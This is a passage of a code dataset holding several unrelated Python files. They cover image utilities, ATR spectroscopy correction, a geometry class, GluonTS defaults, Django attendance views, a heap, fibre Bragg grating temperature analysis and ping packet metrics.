os\nimport cv2\nfrom skimage import color\n\ndef toInt8(img):\n info = normalize(img)\n data = 255 * info # Now scale by 255\n img2 = data.astype(np.uint8)\n return img2\ndef normalize(array):\n min_val = np.min(array)\n temp_val = array - min_val\n max_val = np.max(temp_val)\n if(max_val != 0):\n temp_val = temp_val / max_val\n return temp_val\ndef getDir(maindir,newdir):\n dir = os.path.join(maindir,newdir)\n if not os.path.exists(dir):\n os.makedirs(dir)\n return dir\ndef print_(img):\n print(np.max(img),np.min(img))\n\ndef loadAll(path):\n allFiles = []\n for r, d, f in os.walk(path):\n for file in f:\n allFiles.append(os.path.join(r, file))\n return allFiles\ndef bgrToLab(img):\n print(img.shape)\n m_rgb = img[..., ::-1]\n lab = color.rgb2lab(m_rgb)\n return 
lab","repo_name":"gcalazansdm/AMRObjectDetection","sub_path":"Utils/GeneralUtils.py","file_name":"GeneralUtils.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25455783655","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 10:59:40 2017\n\n@author: ania\n\"\"\"\nimport numpy as np\nfrom scipy import constants\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.metrics import r2_score\n\n\ndef kramers(k,wavenumbers_in):\n# k - imaginary part of refractive index\n# wavenumbers - in cm-1\n#\n# sorting data\n sort_ind=np.argsort(wavenumbers_in)\n wavenumbers=wavenumbers_in[sort_ind]\n# print(np.sum(np.abs(wavenumbers_in-wavenumbers[sort_ind])))\n k=k[sort_ind]\n# vector with dataspacing\n d_waven=wavenumbers[1:]-wavenumbers[0:-1]\n# vector for integration\n delta_waven=np.zeros(wavenumbers.shape)\n delta_waven[0:-1]=delta_waven[0:-1]+d_waven*0.5\n delta_waven[1:]=delta_waven[1:]+d_waven*0.5\n delta_waven[[0,-1]]=2*delta_waven[[0,-1]]\n# denominator\n mianownik=wavenumbers[:,None]**2 - wavenumbers[None,:]**2\n mianownik[np.diag_indices(wavenumbers.size)]=np.finfo(float).eps\n# matrix for integration along 0th dimension\n calka=(wavenumbers[:,None] * k[:,None] * delta_waven[:,None] )/mianownik\n calka[np.diag_indices(wavenumbers.size)]=0\n calka[np.isinf(calka)]=0\n# result - the refractive index\n# value 1.485 is the shift for toluene taken from \"Determination of infrared optical constants for single-component hydrocarbon fuels\"\n n=2/np.pi*np.nansum(calka,axis=0) + 1.485\n# rearranging back\n new_range=np.arange(wavenumbers.size)\n new_ind=new_range[sort_ind]\n return n[new_ind]\n \n \n\ndef abs_exact(n,k,wavenumbers,ncryst,angle,nrefl):\n theta=angle*np.pi/180\n n2=n+k*1j\n rs12= (ncryst*np.cos(theta) - 1j*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) / \\\n (ncryst*np.cos(theta) + 1j*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) )\n rp12= (ncryst**2 * np.cos(theta) - 1j*ncryst*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) / \\\n (ncryst**2 * np.cos(theta) + 1j*ncryst*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) \n Rs=(rs12 * rs12.conj()).real\n Rp=(rp12 * rp12.conj()).real\n R=0.5*(Rs**nrefl+Rp**nrefl)\n Aexact=-np.log10(R)\n return Aexact\n\ndef plotting(x,ys,filename):\n if type(ys) is not list:\n ys=[ys]\n plt.ioff()\n fig = plt.figure(figsize=(8,8*9/16))\n fig.add_subplot(111)\n colors=['k','b','r','g','m']\n colors=colors*(len(ys)//5) + colors[slice(len(ys)%5)]\n \n for y,color in zip(ys,colors):\n plt.plot(x,y/np.max(y),'-'+color) \n \n plt.savefig(os.path.splitext(filename)[0]+'.svg')\n plt.cla()\n plt.close('all')\n \n\ndef atr_exact(filename,ncryst=2.4,angle=45,nrefl=1,r2=1):\n \n widmo=np.genfromtxt(filename,delimiter=' ')\n Aexp=widmo[:,1]\n Aexp[Aexp==0]=np.finfo(float).eps\n wavenumbers=widmo[:,0]\n theta=angle*np.pi/180\n#==============================================================================\n# # initial guesses for n and k\n#==============================================================================\n n=1.5*np.ones(Aexp.shape)\n # k from approx formula\n k=Aexp * (ncryst**2-n**2) * np.sqrt(ncryst**2 * np.sin(theta)**2 - n**2) / (0.434 * 3/2 * 4 *n*ncryst*np.cos(theta))/nrefl\n n=kramers(k,wavenumbers)\n#==============================================================================\n# # atr signal from exact formulas\n#==============================================================================\n 
Aexact=abs_exact(n,k,wavenumbers,ncryst,angle,nrefl)\n cond = np.abs(1-r2_score(Aexp,Aexact))\n it=0\n while cond>0.01:\n # from approx formula from:\n # Milosevic, Milan. Internal reflection and ATR spectroscopy. Vol. 262. John Wiley & Sons, 2012.\n delta_A=Aexp-Aexact\n delta_k=delta_A*(ncryst**2-n**2) * np.sqrt(ncryst**2 * np.sin(theta)**2 - n**2) / (0.434 * 3/2 * 4 *n*ncryst*np.cos(theta)) / nrefl\n delta_k[np.isnan(delta_k)]=np.finfo(float).eps\n k=k+delta_k\n n=kramers(k,wavenumbers)\n Aexact=abs_exact(n,k,wavenumbers,ncryst,angle,nrefl)\n cond = np.abs(1-r2_score(Aexp,Aexact))\n it+=1\n print('=====exact ',it)\n\n#==============================================================================\n# # outputs \n#==============================================================================\n # this is not molar ext coefficient, but a value proportional to molar ext coeff\n molar_ext=k * wavenumbers\n plotting(wavenumbers,[Aexp,Aexact,molar_ext],filename)\n np.savetxt(os.path.splitext(filename)[0]+'_ref_ind.txt',np.concatenate( (wavenumbers[:,None],n[:,None]), axis=1) )\n np.savetxt(os.path.splitext(filename)[0]+'_molar_ext.txt',np.concatenate( (wavenumbers[:,None],molar_ext[:,None]), axis=1) )\n \n \n","repo_name":"akelm/atr_correction","sub_path":"atr.py","file_name":"atr.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70363400215","text":"#!/usr/bin/python3\n\"\"\"Module that creates a child class which inherits\nfrom class: Rectangle\n\"\"\"\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Defines a child class\"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Initialization\"\"\"\n self.size = size\n super().__init__(size, size, x, y, id)\n\n def __str__(self):\n \"\"\"Returns string\"\"\"\n name = str(\"[Square] \")\n i = str(self.id)\n x = str(self.x)\n y = str(self.y)\n w = str(self.width)\n return (name + \"(\" + i + \") \" + x + \"/\" + y + \" - \" + w)\n\n @property\n def size(self):\n return self.width\n\n @size.setter\n def size(self, size):\n self.width = size\n self.height = size\n\n def update(self, *args, **kwargs):\n \"\"\"Updates class with addition of attributes\n using args(ints) and kwargs(dict - key/value pair)\n \"\"\"\n count = 1\n if args and len(args):\n for arg in args:\n if count == 1:\n self.id = arg\n elif count == 2:\n self.size = arg\n elif count == 3:\n self.x = arg\n elif count == 4:\n self.y = arg\n count += 1\n\n else:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n elif key == \"size\":\n self.size = value\n elif key == \"x\":\n self.x = value\n elif key == \"y\":\n self.y = value\n\n def to_dictionary(self):\n \"\"\"Returns dictionary representation of class\"\"\"\n return {\n \"id\": self.id,\n \"size\": self.size,\n \"x\": self.x,\n \"y\": self.y\n }\n","repo_name":"jubriltayo/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12718832723","text":"from pathlib import Path\n\n# Default GluonTS version for when the framework version is not specified.\n# This is no longer updated so as to not break existing workflows.\nGLUONTS_VERSION = \"0.4.1\"\n\n# Framework related\nFRAMEWORK_NAME = \"GluonTS\"\nLOWEST_MMS_VERSION = \"1.4\"\nLOWEST_SCRIPT_MODE_VERSION = \"0\", 
\"4\", \"1\"\nLATEST_GLUONTS_VERSION = \"0.4.1\"\nPYTHON_VERSION = \"py3\"\n\n# Training related\nENTRY_POINTS_FOLDER = Path(__file__).parent.resolve() / \"entry_point_scripts\"\nTRAIN_SCRIPT = \"train_entry_point.py\"\nMONITORED_METRICS = \"mean_wQuantileLoss\", \"ND\", \"RMSE\"\nNUM_SAMPLES = 100\nQUANTILES = 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/sagemaker_sdk/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"37871392580","text":"import cloudinary\nimport cloudinary.uploader\nimport cloudinary.api\nimport uuid\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom attendance_app.apps.asistencia.models import Asistencia, Personal\nfrom attendance_app.apps.asistencia.serializers import SetAsistenciaSerializer, GetAsistenciaSerializer\n\nfrom datetime import date, datetime, timedelta\nfrom django.utils import timezone\nimport datetime as dt\nimport time\nfrom PIL import Image\nimport numpy as np\nimport face_recognition\nimport cv2\n\n\n@api_view(['GET', 'POST'])\ndef asistencia(request):\n if request.method == \"GET\":\n fecha = request.GET.get('fecha', '')\n\n fecha = datetime.today() if fecha == '' else datetime.strptime(fecha, '%d-%m-%Y')\n\n id_persona = int(request.GET.get('idPersona', '0'))\n\n if id_persona != 0:\n listado = Asistencia.objects.filter(creado__date=fecha.date(), personal_id=id_persona)\n else:\n listado = Asistencia.objects.filter(creado__date=fecha.date())\n\n serializer = GetAsistenciaSerializer(listado, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n elif request.method == 'POST':\n mensaje = False\n id_personal = int(request.GET.get('persona'))\n evento = 0\n\n file_in_memory = request.FILES['imagen']\n\n try:\n asistencias_persona = Asistencia.objects.filter(personal_id=id_personal, creado__date=date.today()).last()\n\n diferencia = abs(datetime.now() - asistencias_persona.creado)\n minutos = divmod(diferencia.seconds, 60)\n\n if minutos[0] > 10:\n\n if asistencias_persona.evento == 0:\n evento = 1\n mensaje = registrar_asistencia(id_personal, file_in_memory, evento)\n\n except:\n mensaje = registrar_asistencia(id_personal, file_in_memory, evento=evento)\n\n return Response({'mensaje': mensaje})\n\n\ndef guardar_imagen(file_in_memory):\n content_type = file_in_memory.content_type\n filename = str(uuid.uuid4()) + '.jpg'\n archivo = SimpleUploadedFile(filename, file_in_memory.read(), content_type)\n res = cloudinary.uploader.upload(archivo)\n return res['secure_url']\n\n\n@api_view(['GET'])\ndef asistencia_por_personal(request, id_personal):\n listado = Asistencia.objects.filter(personal_id=id_personal)\n asistencia_personal_serializer = GetAsistenciaSerializer(listado, many=True)\n\n return Response(asistencia_personal_serializer.data, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef asistencia_por_personal_rango(request, id_personal):\n fecha1 = request.GET.get('fecha1', '')\n fecha2 = request.GET.get('fecha2', '')\n\n fecha1 = datetime.strptime(fecha1, '%d-%m-%y')\n fecha2 = datetime.strptime(fecha2, '%d-%m-%y') + timedelta(days=1)\n\n listado = Asistencia.objects.filter(personal_id=id_personal, creado__rabge=[fecha1, fecha2])\n asistencia_personal_serializer = 
return Response(asistencia_personal_serializer.data, status=status.HTTP_200_OK)\n\n\ndef registrar_asistencia(id, image_file, evento):\n image_url = guardar_imagen(image_file)\n\n asistencia_data = {'personal': id, 'imagen': image_url, 'evento': evento, 'tipo_evento': tipo_evento()}\n\n asistencia_serializer = SetAsistenciaSerializer(data=asistencia_data)\n\n if asistencia_serializer.is_valid():\n asistencia_serializer.save()\n return True\n else:\n return asistencia_serializer.errors\n\n\ndef tipo_evento():\n hora = datetime.now().hour\n if hora < 12:\n return 0\n else:\n return 1\n","repo_name":"Gerardotr/attendance_app","sub_path":"attendance_app/apps/asistencia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"10078823679","text":"class Heap(object):\n def __init__(self, values):\n self._values = []\n for value in values:\n self.sift_up(value)\n\n def __len__(self):\n return len(self._values)\n\n def sift_up(self, value):\n values = self._values\n values.append(value)\n index = len(self) - 1\n while index:\n i, j = (index - 1) // 2, index\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n index = i\n else:\n break\n\n def pop(self):\n start = self._values[0]\n end = self._values.pop()\n if len(self):\n self._values[0] = end\n self.sift_down()\n return start\n\n def is_empty(self):\n return not bool(self._values)\n\n def sift_down(self):\n index = 0\n values = self._values\n while 2 * index + 1 < len(self): # descend while a left child exists\n i, j = index, 2 * index + 1\n if j + 1 < len(self) and values[j + 1] < values[j]:\n j += 1\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n index = j\n else:\n break\n\n\nif __name__ == \"__main__\":\n h = Heap([1, 5, 5, 2, 3, 8, 34, 12, 23, 4, 6, 7, 3])\n while not h.is_empty():\n print(h.pop(), end=' ')\n","repo_name":"zhjc1124/practice","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"73486106452","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nfrom HyperionUtilities import HyperionDataset\nfrom HyperionUtilities import calcDetSignal\n#%%\nq = HyperionDataset(fname, channels = [1]); q.colorTempPlot()\n#%%\n#Temperature\nT = [21.4 , 20.5, 17.6, 14.3, 12.2, 11.0, 6.0, 1.1, 1.2, -14.0, -21.0, -27.0, -34.0, -42.0, -46.5,\n -51.0, -57.0, -61.6, -64.0, -72.4, -85.0, -121, -131.7, -148.0, -194.6, -186.4, -183.6, -170.3, -164.2,\n -153.3, -141.0, -128.6, -117.6, -107.8, -99.0, -91.1, -84.2, -77.2, -70.7, -64.5, -59.1, -54.1, -49.6, -45.2,\n -40.8, -36.8, -33.2, -30.0, -26.7, -23.7, -20.7, -17.3, -14.9, -11.4, -9.7, -6.8, -4.5, -2.2, -6.3,\n 1.9, 3.6, 5.1, 6.4, 7.5, 10.2, 11.6]\n#%%\n#Recorded time in (minutes, seconds)\nt_ms = [(0,0), (0,30), (0,50), (1,0), (2,20), (2,30), (2,50), (3,10), (3,40), (4,10), (4,30), (4,50), (5,10), (5,40), (6,0),\n (6,20), (6,40), (7,10), (7,30), (8,00), (9,20), (9,45), (10,0), (10,15), (10,30), (13,20), (13,40), (15,10), (16,00),\n (17,0), (18,0), (19,0), (20,0), (21,0), (22,0), (23,0), (24,0), (25,0), (26,0), (27,0), (28,0), (29,0), (30,0), (31,0),\n (32,0), (33,0), (34,0), (35,0), (36,0), (37,0), (38,0), (39,0), (40,0), (41,22), (42,0), (43,0), (44,0), (45,0), (46,0),\n (48,0), (49,0), (50,0), (51,0), (52,0), (55,0), 
(57,0)]\n#lambda function to convert minutes:seconds to 60*minutes + seconds\nms = lambda m,s: float(m)*60.0 + float(s)\nt = [ms(m,s) for (m,s) in t_ms]\n#%%\nplt.figure()\nplt.plot(t, T)#plot time vs Temp\n#%%\ntempFunc = interp1d(t, T, bounds_error=None, fill_value='extrapolate')\n#%%\n#hyperion data:\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\10\\Responses.20201021164957.txt\"\nq = HyperionDataset(fname)\n#%%\n# plt.figure()\n# dotRng = [1544,5553]\n# dots0 = np.dot(q.data[0,dotRng[0]:dotRng[1] ],q.data[0,dotRng[0]:dotRng[1]])\n# dots = []\n# legends = [str(x) for x in range(len(q.data))]\n# for i in range(len(q.data)):\n# dots.append( np.dot(q.data[0,dotRng[0]:dotRng[1]], q.data[i,dotRng[0]:dotRng[1]]) / dots0 )\n# for i in range(len(dots)):\n# plt.plot(q.time[i],dots[i],'b.',label=legends[i])\n\n# #plt.legend()\n\n# plt.ylabel(\"Dimensionless Temp Detection Signal\", fontsize = 14)\n# plt.xlabel(\"Time (s)\",fontsize = 14)\n# print(dots)\n#%%\n\n\n\n\n\n#%%\nplt.figure()\nplt.plot(t,T)\nplt.xlabel('Time (s)', fontsize = 14)\nplt.ylabel('Temperature (C)', fontsize = 14)\n#%%\n\n#%%\n\n#def colorSpecPlot(specData, skip = 1, labels = None, wavelengthRng = [1548,1552]):\n# numPlots = specData.data.shape[0] // skip\n# color = cm.rainbow( np.linspace(0,1,numPlots) )\n# if labels is None:\n# labels = [None]*numPlots\n# for (spec,c,label) in zip(specData.data[:-1:skip], color, labels):\n# plt.plot( specData.waveLengths, spec.data)\n# plt.xlim([wavelengthRng[0], wavelengthRng[1]])\n\n\n\n#%%\n\n\n\n\n\n#%%\nindRng = [4200,5200]\n#%%\n#print( np.dot( q.waveLengths[ indRng[0]:indRng[1] ], -d[ indRng[0]:indRng[1] ] ) / np.sum(-d[ indRng[0]:indRng[1] ]) )\n\ncenterOfMass = []\npeakWavelength = []\nfor d in q.data[110:]:\n cm = np.dot( q.waveLengths[ indRng[0]:indRng[1] ], -d[ indRng[0]:indRng[1] ] ) / np.sum(-d[ indRng[0]:indRng[1] ])\n centerOfMass.append(cm)\n peakWavelength.append( np.argmax(d) / 100.0 + 1500.0 )\n\ncenterOfMass = np.array(centerOfMass)\npeakWavelength = np.array(peakWavelength)\n#%%\nplt.close('all')\n#%%\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot(q.time[110:], q.centerOfMass[110:] )\nplt.title(\"Center of Mass\")\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Time (s)\", fontsize = 14)\nplt.tight_layout()\nplt.subplot(2,1,2)\nplt.plot(tempFunc(q.time[110:]), q.centerOfMass[110:], 'x')\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Temp (C)\", fontsize = 14)\nplt.title(\"Center of Mass\")\nplt.tight_layout()\n#%%\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot(q.time[130:], q.peakWavelength[130:])\nplt.title(\"Peak Wavelength\")\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Time (s)\", fontsize = 14)\nplt.tight_layout()\nplt.subplot(2,1,2)\nplt.plot(tempFunc(q.time[130:]), q.peakWavelength[130:], 'x')\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Temp (C)\", fontsize = 14)\nplt.title(\"Peak Wavelength\")\nplt.tight_layout()\n#%%\nlambda_coeffs = np.polyfit( tempFunc(q.time[130:]), q.peakWavelength[130:], 2)\ntempFit = np.linspace(tempFunc(q.time[130:]),10,100)\nfitLine = np.polyval( lambda_coeffs, tempFit )\n\n#plt.subplot(2,1,1)\nplt.plot(tempFit, fitLine, 'k')\nplt.title('lambda(T) = -2.13e-05 T^2 + 5.84 e-03 T + 1500 nm \\n\\n ~ 5.8 pm / K ')\n#%%%%%%%%%%%%%%%%%\n#fname = r\"C:\\Users\\dmeichle\\CFS Dropbox\\CFS_Internal\\R&D\\CSMC\\Fiberoptics\\VPI with fibers\\Spectrum collection 20201030\\Responses.20201030160612_Solderflow+cooldown.txt\"\nplt.close('all')\nq = 
HyperionDataset(channels=[1])\n#q.plotSpec(wavelengthRng=[1500,1600])\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\n#%%\n#cool down:\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.plot(q.peakWavelength)\n\n\n#%%\n#next was ~1-2 min idle, then turn heater on 30V @ .19A = 5.7 W\n\n\n\n\n#then turned heater off to cool back down.\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.figure()\nplt.plot(q.peakWavelength)\n#%%\nprint( q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 )\n\n#%%\n#unknown: \nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.figure()\nplt.plot(q.peakWavelength)\n#(1547.15 - 1546.96)/.0058 (cooling)\n#32.75862068966458\n\n\n#%%\nplt.title(\"Detection signal vs time \\n 5.7 Watts (4 kJ net) heat applied at 77 K initial\", fontsize = 14)\nplt.tight_layout()\n#%%\nindRng = [4200,5100]\nplt.figure()\nplt.plot(q.waveLengths[4200:5100], q.data[-1, 4200:5100],color = 'b', label = '77 Kelvin')\nplt.plot(q.waveLengths[4200:5100], q.data[ 0, 4200:5100],color = 'r', label = '5.7 W after 700 s (4 kJ)')\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.title(\"Spectrum before and after heat applied\", fontsize = 14)\nplt.legend()\nplt.tight_layout()\n#%%\n\n#%%\nplt.close('all')\ndataList = []\nfor o in range(0,5):\n q = HyperionDataset(channels=[1], recentFileOffset = -o);# q.plotSpec(wavelengthRng=[1500,1600], skip=10);\n plt.figure()\n plt.plot(q.peakWavelength)\n print(q.peakWavelength[0], q.peakWavelength[-1], q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 )\n plt.title([str(a) for a in [o, q.peakWavelength[0], q.peakWavelength[-1], q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 ]] )\n dataList.append(q)\n print(str(o), q.dataFile)\n#%%:\n#ok so here is whats what: \n\n#Cool back down after heated\no=0\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\"\n\n\n#Unknown - maybe hanging out at 77 or with heater saturated. 
will check spec\no=1\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106174709.txt\"\n\n\n#Heater applied at 5.7 Watts for 700 seconds (only dataset with peak rising)\no=2\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\"\n\no=3\n#junk\n\n#cool from room to 77K\no=4\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\"\n#%%\n\ncoolDown216 = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\", channels=[1])\nheaterOn = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\", channels=[1])\ncoolAfterHeat = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\", channels=[1])\n#%%\ndata = [coolDown216, heaterOn, coolAfterHeat ]\ntitles = ['Cool from 293K to 77K', 'Heater on 5.7 W for 700 s', 'Heater Off Cooling back to 77 K']\n#%%\nplt.close('all)')\n#%%\nfor (q,theTitle) in zip(data, titles):\n plt.figure()\n #plt.plot(q.time, q.peakWavelength)\n plt.subplot(2,1,1)\n plt.plot( q.time, q.peakWavelength)\n plt.xlabel(\"Time (s)\", fontsize = 14)\n plt.ylabel(\"Peak Wavelength\", fontsize = 14)\n diagStr = 'Initial {:3.2f} nm Final {:3.2f} nm Change {:3.2f} nm'.format( q.peakWavelength[0], q.peakWavelength[-1], -( q.peakWavelength[0] - q.peakWavelength[-1] ) )\n plt.title(theTitle + '\\n' + diagStr)\n plt.grid()\n plt.tight_layout()\n\n plt.subplot(2,1,2)\n plt.plot(q.waveLengths, q.data[0, :], label = 'Initial')\n plt.plot(q.waveLengths, q.data[-1, :], label = 'Final')\n plt.xlabel('Wavelength (nm)', fontsize = 14)\n plt.ylabel('Reflected Power (dB)', fontsize = 14)\n plt.xlim([1542, 1551])\n plt.title(theTitle + '\\n' + diagStr)\n plt.grid()\n plt.tight_layout()\n#%%\n\ncolorTempPlot(data[1], lambda x:-1, skip = 25)\nplt.title(\"Heater On\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n\n#%%\n\n\ncolorTempPlot(data[0], lambda x:-1, skip = 10)\nplt.title(\"Cool from 293 K to 77 K\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n#%%\n\n\ncolorTempPlot(data[2], lambda x:-1, skip = 10)\nplt.title(\"Heater Off\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n#%%\n#make covariance matrix:\nd = q.data[1:-2,4000:5750]\n\nd -= np.min(d); d /= np.max(d)\nfor l in d:\n plt.plot(l)\n#%%\nc = np.cov( d )\n#%%\ndata = [coolDown216, heaterOn, coolAfterHeat ]\n\nfor (q, theTitle) in zip(data, titles):\n d = q.data[:,4250:5650]\n d -= np.min(d); d /= np.max(d)\n c = np.cov( d ,rowvar = False )\n plt.figure()\n plt.imshow(c)\n plt.title(theTitle)\n plt.figure()\n plt.title(theTitle)\n q.colorTempPlot(skip=25)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dpm314/Quench_FBG","sub_path":"Hyperion77Kworkspace.py","file_name":"Hyperion77Kworkspace.py","file_ext":"py","file_size_in_byte":10575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21557876895","text":"\"\"\"\nJack McCarthy\n01/06/2021\nSimple Packet Analyzer: Ping Metrics\nDescription: Takes the parsed lists as an argument and returns metrics to both the terminal and 
output.csv\n\"\"\"\n\ndef compute(compute_list):\n nodeIPs = ['192.168.100.1','192.168.100.2','192.168.200.1','192.168.200.2']\n print(len(compute_list))\n for x in range(len(compute_list)):\n all_data= compute_list[x]\n IP = nodeIPs[x]\n reqSent = 0\n reqRecv = 0\n repSent = 0\n repRecv = 0\n totalReqSentFrameSize = 0\n totalReqRecvFrameSize = 0\n totalReqSentData = 0\n totalReqRecvData = 0\n RTTtemp = -1\n totalRTT = 0\n delayTemp = -1\n totalDelay = 0\n hopTemp = -1\n totalHop = 0\n\n# 0/7=No. 1/8=time 2=source address 3=destination address 4=length(frame) 5(ping/request)\n# 6=sequence number 7=ttl\n\n for data in all_data:\n \n if data[2] == IP: # Sent Frames\n \n if data[5] == \"request\": # Sent request Frames\n reqSent += 1\n totalReqSentFrameSize += int(data[4])\n totalReqSentData += int(data[4]) - 42\n hopTemp = int(data[7]) # TTL fields are parsed as strings, so cast before the hop arithmetic below\n RTTtemp = float(data[1])\n\n elif data[5] == \"reply\": # Sent reply Frames\n repSent += 1\n if delayTemp != -1:\n totalDelay += float(data[1]) - delayTemp\n delayTemp = -1\n elif data[3] == IP: # Recv Frames\n if data[5] == \"request\": # Recv request Frames\n reqRecv += 1\n totalReqRecvFrameSize += int(data[4])\n totalReqRecvData += int(data[4]) - 42\n delayTemp = float(data[1])\n elif data[5] == \"reply\": # Recv reply Frames\n repRecv += 1\n if RTTtemp != -1:\n totalRTT += float(data[1]) - RTTtemp\n RTTtemp = -1\n if hopTemp != -1:\n totalHop += hopTemp - int(data[7]) + 1\n hopTemp = -1\n avgRTT = totalRTT / repRecv * 1000\n throughput = totalReqSentFrameSize / totalRTT /1000\n goodput = totalReqSentData / totalRTT / 1000\n avgDelay = totalDelay / repSent * 1000000\n avgHop = totalHop / repRecv\n nodeVal=x+1\n\n
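# Metric notes: throughput counts whole frame bytes over the summed round-trip\n# time, while goodput counts payload only (frame length minus 42 bytes of\n# Ethernet/IP/ICMP headers); delay and hop count are per-reply averages.\n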
#Creates a CSV of metrics\n output = open(\"output.csv\", \"a\")\n output.write(\"Node \" + str(nodeVal))\n output.write('\\n\\n')\n output.write(\"Echo Requests Sent,Echo Request Received,Echo Replies Sent,Echo Replies Received,\\n\")\n output.write(str(reqSent)+\",\"+str(reqRecv)+\",\"+str(repSent)+\",\"+str(repRecv)+\"\\n\")\n output.write(\"Echo Request Bytes Sent (bytes),Echo Request Data Sent (bytes)\\n\")\n output.write(str(totalReqSentFrameSize)+\",\"+str(totalReqSentData)+\"\\n\")\n output.write(\"Echo Request Bytes Received (bytes),Echo Request Data Received (bytes)\\n\")\n output.write(str(totalReqRecvFrameSize)+\",\"+str(totalReqRecvData)+\"\\n\")\n output.write('\\n')\n output.write(\"Average RTT (milliseconds),\"+str(round(avgRTT,2))+\"\\n\")\n output.write(\"Echo Request Throughput (kB/sec),\"+str(round(throughput,1))+\"\\n\")\n output.write(\"Echo Request Goodput (kB/sec),\"+str(round(goodput,1))+\"\\n\")\n 